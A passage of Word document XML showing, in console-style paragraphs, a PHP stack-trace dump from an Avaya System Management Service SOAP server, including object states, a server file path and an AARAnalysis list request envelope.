          <w:p w14:paraId="2A2271DE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        2 =&gt; 'select',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06772114" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        3 =&gt; 'value',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="233C9E0F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        4 =&gt; 'radio',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67887C37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        5 =&gt; 'checkbox',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1230DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        6 =&gt; 'text',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E92A76" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        7 =&gt; 'index',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A0EAFBB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        8 =&gt; 'iterator',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007881FD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A1F6D5A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12B2D025" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_listIndex</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E7CE21" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_fld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DBB068" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_labelSuffix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120B2A93" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516D03FF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3F291F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38198226" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45A2B742" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; 'test',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5D3572" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      1 =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D8216B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      2 =&gt; 'list',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0686D8E5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3B868E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA5ECB9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  6 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147747DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0C5D72" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>submitRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5869C3CA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_WebService</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C89135E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B8E812" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>WebService</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DABDC2D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>headerHandler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152A5177" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Header_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Handler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1383EEAA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8fbe4399aeaf48d9701ee804c1aad983',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4767BE95" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_original_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8fbe4399aeaf48d9701ee804c1aad983',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72073743" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_session</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19DFFD14" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40FCA5EF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>allow_http</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '1',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3776881C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>is_https</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59505C2F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'fault' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AED51E2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sid_processed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D6B50FF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="190F3742" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C792C0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E55BD4C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4BD5A9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A50B86B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>submitRequestType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BFBCD0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'model' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AARAnalysis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77BB262A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'operation' =&gt; 'list',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B418B6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'test',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5524D6E8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'qualifier' =&gt; 'test',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0155657E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'fields' =&gt; '*',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442332C5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155F788D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA07505" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B5F258" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  7 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071EF649" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DAF99A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'file' =&gt; '/opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mvap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/web/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SystemManagementService.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A673CA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 638,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CB50D56" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; 'handle',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08CD66F3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SoapServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF32F6D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6F3672" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SoapServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B88A90D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'service' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04CA3876" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE4A716" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AEAD4E1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF58612" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F251B35" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; '&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D91A2B7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP-ENV:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xmlns:SOAP-ENV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://xml.avaya.com/ws/SystemManagementService/2005/04/04" xmlns:ns2="http://xml.avaya.com/ws/session"&gt;&lt;SOAP-ENV:Header&gt;&lt;ns2:sessionID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP-ENV:mustUnderstand</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>="1" SOAP-ENV:actor="http://schemas.xmlsoap.org/soap/actor/next"/&gt;&lt;/SOAP-ENV:Header&gt;&lt;SOAP-ENV:Body&gt;&lt;ns1:submitRequest&gt;&lt;model&gt;AARAnalysis&lt;/model&gt;&lt;operation&gt;list&lt;/operation&gt;&lt;objectname&gt;test&lt;/objectname&gt;&lt;qualifier&gt;test&lt;/qualifier&gt;&lt;fields&gt;*&lt;/fields&gt;&lt;/ns1:submitRequest&gt;&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271BED85" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7573D324" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77780562" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
